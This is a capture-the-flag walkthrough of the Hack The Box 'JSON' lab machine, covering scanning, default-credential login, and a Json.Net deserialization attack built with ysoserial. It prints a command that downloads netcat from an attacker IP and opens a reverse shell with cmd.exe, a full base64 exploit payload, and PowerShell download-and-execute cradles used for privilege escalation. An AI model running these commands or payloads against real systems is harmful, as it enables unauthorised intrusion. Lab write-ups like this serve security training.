Hack The Box: JSON Walkthrough

130n@calvinlai.com

Author: 

@27 Nov 2019

Acknowledgement:

The game cannot be completed without the support of our friends of CTF Playgroup Hong Kong & Macau        

Background:

Objective

Get the user.txt and root.txt

Penetrating Methodology:

Service Scanning

Enumeration

Exploitation

Getting Less Privilege Shell

Walkthrough:

Target machine: 10.10.10.158

Attacking (Hacker) machine: 10.10.14.18

Hacking Process Part 0 – Service Scanning

The target machine IP is 10.10.10.158. Get a basic understanding the available services of the target machine using nmap aggressive scanning to all available ports.

0.1) Quick Pre-searching

nmap -p- 10.10.10.158

0.2) Details Analysis

nmap -sV -p 21,80,135,139,445,5985,47001,49152,49153,49154,49155,49156,49157,49158 -A -oN nmap-htb-json-details.txt 10.10.10.158

PORT      STATE SERVICE      VERSION

21/tcp    open  ftp          FileZilla ftpd

| ftp-syst:

|_  SYST: UNIX emulated by FileZilla

80/tcp    open  http         Microsoft IIS httpd 8.5

| http-methods:

|_  Potentially risky methods: TRACE

|_http-server-header: Microsoft-IIS/8.5

|_http-title: Json HTB

135/tcp   open  msrpc        Microsoft Windows RPC

139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn

445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds

5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

|_http-server-header: Microsoft-HTTPAPI/2.0

|_http-title: Not Found

47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

|_http-server-header: Microsoft-HTTPAPI/2.0

|_http-title: Not Found

49152/tcp open  msrpc        Microsoft Windows RPC

49153/tcp open  msrpc        Microsoft Windows RPC

49154/tcp open  msrpc        Microsoft Windows RPC

49155/tcp open  msrpc        Microsoft Windows RPC

49156/tcp open  msrpc        Microsoft Windows RPC

49157/tcp open  msrpc        Microsoft Windows RPC

49158/tcp open  msrpc        Microsoft Windows RPC

Enumeration strategies

  1. Check Website Vulnerability  
  2. Check any hidden files/folders of the website
  3. Check the FTP port
  4. Check the website

Hacking Process Part 1 – Enumeration

1.1) Strategy 1 Check Vulnerability

Nikto -- no vulnerability can be abused to bypass authentication.


1.2) Strategy 2 Check Hidden folder

Using dirb


Using gobuster

No hidden files/folders found for the exploitation.

1.3) Strategy 4 FTP

It does not allow anonymous login


1.4) Strategy 3 web page

Visit the web page

Using Json for the authorisation

Index.html

After several try if was found that the login credentials is admin/admin

eyJJZCI6MSwiVXNlck5hbWUiOiJhZG…Sb2wiOiJBZG1pbmlzdHJhdG9yIn0=

{

  "Id": 1,

  "UserName": "admin",

  "Password": "21232f297a57a5a743894a0e4a801fc3",

  "Name": "User Admin HTB",

  "Rol": "Administrator"

}

Hacking Process Part 2 – Exploitation

2.1) OAuth Token Exploitation

Login to the website and replace the token with the generated

As the name implies that it should be related to the JSON attack. Try the ysoserial to prepare the exploit payload for the OAuth2 token.

 

  1. Download the ysoserial tools

Download the master-release-29.zip and unzip the file

  1. Prepare the strings to generate the payload

Switch off the window defender

Check how to save the file at target windows environment

ysoserial.exe -f Json.Net -g WindowsIdentity -o base64 -c "certutil.exe -urlcache -split -f "http://10.10.15.158:8888/nc.exe" "C:\windows\system32\spool\drivers\color\nc.exe"&"C:\windows\system32\spool\drivers\color\nc.exe" 10.10.15.158 1234 -e cmd.exe"

ew0KICAgICAgICAgICAgICAgICAgICAnJHR5cGUnOiAnU3lzdGVtLlNlY3VyaXR5LlByaW5jaXBhbC5XaW5kb3dzSWRlbnRpdHksIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OScsDQogICAgICAgICAgICAgICAgICAgICdTeXN0ZW0uU2VjdXJpdHkuQ2xhaW1zSWRlbnRpdHkuYm9vdHN0cmFwQ29udGV4dCc6ICdBQUVBQUFELy8vLy9BUUFBQUFBQUFBQU1BZ0FBQUVsVGVYTjBaVzBzSUZabGNuTnBiMjQ5TkM0d0xqQXVNQ3dnUTNWc2RIVnlaVDF1WlhWMGNtRnNMQ0JRZFdKc2FXTkxaWGxVYjJ0bGJqMWlOemRoTldNMU5qRTVNelJsTURnNUJRRUFBQUNFQVZONWMzUmxiUzVEYjJ4c1pXTjBhVzl1Y3k1SFpXNWxjbWxqTGxOdmNuUmxaRk5sZEdBeFcxdFRlWE4wWlcwdVUzUnlhVzVuTENCdGMyTnZjbXhwWWl3Z1ZtVnljMmx2YmowMExqQXVNQzR3TENCRGRXeDBkWEpsUFc1bGRYUnlZV3dzSUZCMVlteHBZMHRsZVZSdmEyVnVQV0kzTjJFMVl6VTJNVGt6TkdVd09EbGRYUVFBQUFBRlEyOTFiblFJUTI5dGNHRnlaWElIVm1WeWMybHZiZ1ZKZEdWdGN3QURBQVlJalFGVGVYTjBaVzB1UTI5c2JHVmpkR2x2Ym5NdVIyVnVaWEpwWXk1RGIyMXdZWEpwYzI5dVEyOXRjR0Z5WlhKZ01WdGJVM2x6ZEdWdExsTjBjbWx1Wnl3Z2JYTmpiM0pzYVdJc0lGWmxjbk5wYjI0OU5DNHdMakF1TUN3Z1EzVnNkSFZ5WlQxdVpYVjBjbUZzTENCUWRXSnNhV05MWlhsVWIydGxiajFpTnpkaE5XTTFOakU1TXpSbE1EZzVYVjBJQWdBQUFBSUFBQUFKQXdBQUFBSUFBQUFKQkFBQUFBUURBQUFBalFGVGVYTjBaVzB1UTI5c2JHVmpkR2x2Ym5NdVIyVnVaWEpwWXk1RGIyMXdZWEpwYzI5dVEyOXRjR0Z5WlhKZ01WdGJVM2x6ZEdWdExsTjBjbWx1Wnl3Z2JYTmpiM0pzYVdJc0lGWmxjbk5wYjI0OU5DNHdMakF1TUN3Z1EzVnNkSFZ5WlQxdVpYVjBjbUZzTENCUWRXSnNhV05MWlhsVWIydGxiajFpTnpkaE5XTTFOakU1TXpSbE1EZzVYVjBCQUFBQUMxOWpiMjF3WVhKcGMyOXVBeUpUZVhOMFpXMHVSR1ZzWldkaGRHVlRaWEpwWVd4cGVtRjBhVzl1U0c5c1pHVnlDUVVBQUFBUkJBQUFBQUlBQUFBR0JnQUFBTDRCTDJNZ1kyVnlkSFYwYVd3dVpYaGxJQzExY214allXTm9aU0F0YzNCc2FYUWdMV1lnYUhSMGNEb3ZMekV3TGpFd0xqRTFMakUxT0RvNE9EZzRMMjVqTG1WNFpTQkRPbHgzYVc1a2IzZHpYSE41YzNSbGJUTXlYSE53YjI5c1hHUnlhWFpsY25OY1kyOXNiM0pjYm1NdVpYaGxKa002WEhkcGJtUnZkM05jYzNsemRHVnRNekpjYzNCdmIyeGNaSEpwZG1WeWMxeGpiMnh2Y2x4dVl5NWxlR1VnTVRBdU1UQXVNVFV1TVRVNElERXlNelFnTFdVZ1kyMWtMbVY0WlFZSEFBQUFBMk50WkFRRkFBQUFJbE41YzNSbGJTNUVaV3hsWjJGMFpWTmxjbWxoYkdsNllYUnBiMjVJYjJ4a1pYSURBQUFBQ0VSbGJHVm5ZWFJsQjIxbGRHaHZaREFIYldWMGFHOWtNUU1EQXpCVGVYTjBaVzB1UkdWc1pXZGhkR1ZUWlhKcFlXeHBlbUYwYVc5dVNHOXNaR1Z5SzBSbGJHVm5ZWFJsUlc1MGNua3ZVM2x6ZEdWdExsSmxabXhsWTNScGIyNHVUV1Z0WW1WeVNXNW1iMU5sY21saGJHbDZZWFJwYjI1SWIyeGtaWEl2VTNsemRHVnRMbEpsWm14bFkzUnBiMjR1VFdWdFltVnlTVzVtYjFObGNtbGhiR2w2WVhScGIyNUliMnhrWlhJSkNBQUFBQWtKQUFBQUNRb0FBQUFFQ0FBQUFEQlRlWE4wWlcwdVJHVnNaV2RoZEdWVFpYSnBZV3hwZW1GMGFXOXVTRzlzWkdWeUswUmxiR1ZuWVhSbFJXNTBjbmtIQUFBQUJIUjVjR1VJWVhOelpXMWliSGtHZEdGeVoyVjBFblJoY21kbGRGUjVjR1ZCYzNObGJXSnNlUTUwWVhKblpYUlVlWEJsVG1GdFpRcHRaWFJvYjJST1lXMWxEV1JsYkdWbllYUmxSVzUwY25rQkFRSUJBUUVETUZONWMzUmxiUzVFWld4bFoyRjBaVk5sY21saGJHbDZZWFJwYjI1SWIyeGtaWElyUkdWc1pXZGhkR1ZGYm5SeWVRWUxBQUFBc0FKVGVYTjBaVzB1Um5WdVkyQXpXMXRUZVhOMFpXMHVVM1J5YVc1bkxDQnRjMk52Y214cFlpd2dWbVZ5YzJsdmJqMDBMakF1TUM0d0xDQkRkV3gwZFhKbFBXNWxkWFJ5WVd3c0lGQjFZbXhwWTB0bGVWUnZhMlZ1UFdJM04yRTFZelUyTVRrek5HVXdPRGxkTEZ0VGVYTjBaVzB1VTNSeWFXNW5MQ0J0YzJOdmNteHBZaXdnVm1WeWMybHZiajAwTGpBdU1DNHdMQ0JEZFd4MGRYSmxQVzVsZFhSeVlXd3NJRkIxWW14cFkwdGxlVlJ2YTJWdVBXSTNOMkUxWXpVMk1Ua3pOR1V3T0RsZExGdFRlWE4wWlcwdVJHbGhaMjV2YzNScFkzTXVVSEp2WTJWemN5d2dVM2x6ZEdWdExDQldaWEp6YVc5dVBUUXVNQzR3TGpBc0lFTjFiSFIxY21VOWJtVjFkSEpoYkN3Z1VIVmliR2xqUzJWNVZHOXJaVzQ5WWpjM1lUVmpOVFl4T1RNMFpUQTRPVjFkQmd3QUFBQkxiWE5qYjNKc2FXSXNJRlpsY25OcGIyNDlOQzR3TGpBdU1Dd2dRM1ZzZEhWeVpUMXVaWFYwY21Gc0xDQlFkV0pzYVdOTFpYbFViMnRsYmoxaU56ZGhOV00xTmpFNU16UmxNRGc1Q2dZTkFBQUFTVk41YzNSbGJTd2dWbVZ5YzJsdmJqMDBMakF1TUM0d0xDQkRkV3gwZFhKbFBXNWxkWFJ5WVd3c0lGQjFZbXhwWTB0bGVWUnZhMlZ1UFdJM04yRTFZelUyTVRrek5HVXdPRGtHRGdBQUFCcFRlWE4wWlcwdVJHbGhaMjV2YzNScFkzTXVVSEp2WTJWemN3WVBBQUFBQlZOMFlYSjBDUkFBQUFBRUNRQUFBQzlUZVhOMFpXMHVVbVZtYkdWamRHbHZiaTVOWlcxaVpYSkpibVp2VTJWeWFXRnNhWHBoZEdsdmJraHZiR1JsY2djQUFBQUVUbUZ0WlF4QmMzTmxiV0pzZVU1aGJXVUpRMnhoYzNOT1lXMWxDVk5wWjI1aGRIVnlaUXBUYVdkdVlYUjFjbVV5Q2sxbGJXSmxjbFI1Y0dVUVIyVnVaWEpwWTBGeVozVnRaVzUwY3dFQkFRRUJBQU1JRFZONWMzUmxiUzVVZVhCbFcxMEpEd0FBQUFrTkFBQUFDUTRBQUFBR0ZBQUFBRDVUZVhOMFpXMHVSR2xoWjI1dmMzUnBZM011VUhKdlkyVnpjeUJUZEdGeWRDaFRlWE4wWlcwdVUzUnlhVzVuTENCVGVYTjBaVzB1VTNSeWFXNW5LUVlWQUFBQVBsTjVjM1JsYlM1RWFXRm5ibTl6ZEdsamN5NVFjbTlqWlhOeklGTjBZWEowS0ZONWMzUmxiUzVUZEhKcGJtY3NJRk41YzNSbGJTNVRkSEpwYm1jcENBQUFBQW9CQ2dBQUFBa0FBQUFHRmdBQUFBZERiMjF3WVhKbENRd0FBQUFHR0FBQUFBMVRlWE4wWlcwdVUzUnlhVzVuQmhrQUFBQXJTVzUwTXpJZ1EyOXRjR0Z5WlNoVGVYTjBaVzB1VTNSeWFXNW5MQ0JUZVhOMFpXMHVVM1J5YVc1bktRWWFBQUFBTWxONWMzUmxiUzVKYm5Rek1pQkRiMjF3WVhKbEtGTjVjM1JsYlM1VGRISnBibWNzSUZONWMzUmxiUzVUZEhKcGJtY3BDQUFBQUFvQkVBQUFBQWdBQUFBR0d3QUFBSEZUZVhOMFpXMHVRMjl0Y0dGeWFYTnZibUF4VzF0VGVYTjBaVzB1VTNSeWFXNW5MQ0J0YzJOdmNteHBZaXdnVm1WeWMybHZiajAwTGpBdU1DNHdMQ0JEZFd4MGRYSmxQVzVsZFhSeVlXd3NJRkIxWW14cFkwdGxlVlJ2YTJWdVBXSTNOMkUxWXpVMk1Ua3pOR1V3T0RsZFhRa01BQUFBQ2drTUFBQUFDUmdBQUFBSkZnQUFBQW9MJw0KICAgICAgICAgICAgICAgIH0=

C) Prepare the netcat and http server for download the file from target server

Preparing the nc.exe for download


Hacking Process Part 3 – Getting Low Privilege Access

3.1) Login the website and exploit to get the low privilege access

Update the OAuth2 Cookie value and refresh

Get the Systeminfo and save for further evaluation

Searching the user.txt with the command dir user.txt /s /p

Hacking Process Part 4 - Privilege Escalation

4.1) Sherlock to find the vulnerability of the system

powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.18:8888/Sherlock.ps1'); Find-AllVulns -Command 'start powershell.exe'"

MS16-135 exploit-db

https://www.exploit-db.com/exploits/40823

Download the file to target

powershell.exe -exec bypass -command "Invoke-WebRequest 'http://10.10.14.18:8888/ASLRSideChannelAttack.exe' -OutFile 'C:\windows\system32\spool\drivers\color\ASLRSideChannelAttack.exe'"

Execute the ASLRSideChannelAttack.exe, it did not work.

4.2) Using Windows-Exploit-Suggester to find the vulnerability of the system

Using the Windows

https://github.com/AonCyberLabs/Windows-Exploit-Suggester

Save the systeminfo to the file and run the python script to evaluate the system CVE

It was found that the system have the serval possible CVE

Random selected the MS16-098 to exploit, download the exploitable execution file at the exploit-db

Conclusion...

Reference Link

Ysoserial

https://github.com/pwntester/ysoserial.net

Sherlock

https://github.com/rasta-mouse/Sherlock/blob/master/Sherlock.ps1

Windows-Exploit-Suggester

https://github.com/AonCyberLabs/Windows-Exploit-Suggester

https://medium.com/soulsecteam/optimum-10-10-10-8-hackthebox-29f8d58da88f